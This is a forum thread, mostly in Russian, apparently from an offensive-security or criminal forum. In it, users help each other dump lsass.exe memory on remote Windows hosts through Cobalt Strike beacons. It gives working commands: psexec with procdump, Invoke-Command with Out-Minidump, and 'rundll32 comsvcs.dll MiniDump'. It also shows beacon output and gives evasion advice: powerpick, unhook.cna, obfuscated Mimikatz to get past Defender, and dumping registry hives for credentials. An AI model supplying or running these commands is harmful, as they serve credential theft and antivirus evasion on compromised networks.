remote-exec (cobaltstrike) помощь начинающему

[upg]

Помогите, как в кобальт страйк прописать правильно команду что бы на удаленном хосте запустить cmd и сохранить результат ?

Пытаюсь примерно сделать так, запрос уходит без результата
remote-exec psexec 192.168.0.0 C:\Windows\system32\cmd.exe /c C:\windows\temp\procdump64.exe -accepteula -ma lsass.exe C:\windows\temp\1.dmp 2>&1

 

[upg]

с Invoke-Command

Помогите с кодом плз
Получилось снять дамп Out-Minidump.ps1 на хосте где беакон
Но, не получается через Invoke-Command

Исполнил команду,

beacon> powershell Invoke-Command -ComputerName 192.168.0.2 -Get-Process lsass | Out-Minidump c:\temp\Out-Minidump.ps1
[*] Tasked beacon to run: Invoke-Command -ComputerName 192.168.0.2 -Get-Process lsass | Out-Minidump c:\temp\Out-Minidump.ps1
[+] host called home, sent: 327 bytes
[-] could not spawn powershell -nop -exec bypass -EncodedCommand SQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAALQBDAG8AbQBwAHUAdABlAHIATgBhAG0AZQAgADEAOQAyAC4AMQA2ADgALgAwAC4AMgAgAC0ARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAbABzAGEAcwBzACAAfAAgAE8AdQB0AC0ATQBpAG4AaQBkAHUAbQBwACAAYwA6AFwAdABlAG0AcABcAE8AdQB0AC0ATQBpAG4AaQBkAHUAbQBwAC4AcABzADEA (token): 5

 

[Shell-Hunter]

Help, how to write the correct command to the cobalt strike to run cmd on the remote host and save the result?

I'm trying to do something like this, the request goes without result
remote-exec psexec 192.168.0.0 C: \ Windows \ system32 \ cmd.exe / c C: \ windows \ temp \ procdump64.exe -accepteula -ma lsass.exe C: \ windows \ temp \ 1.dmp 2> & 1

bro in updated windows environment you can not dump lsass exe ....but if you wanna get credentials you can dump registry hives to extract credentials.

 

[upg]

вместо powershell используй powerpick, и добавь в script manager unhook.cna

Спасибо, все получилось

 

[wav]

Можно и так.
shell rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 612 C:\Users\admin\Desktop\lsass.dmp full
612 - pid процесса lsass

 

[upg]

Можно и так.
shell rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 612 C:\Users\admin\Desktop\lsass.dmp full
612 - pid процесса lsass

Спасибо этот вариант больше рабочий, пс out-minidump.ps1 палится дефендером и скорей всего облачныйми ав, толка от него нет

 

[wav]

Спасибо этот вариант больше рабочий, пс out-minidump.ps1 палится дефендером и скорей всего облачныйми ав, толка от него нет

естестно он палится, а лучше юзать сразу мимку в ps не требуется выкачивать дамп с лисы, естестно обфусцированную.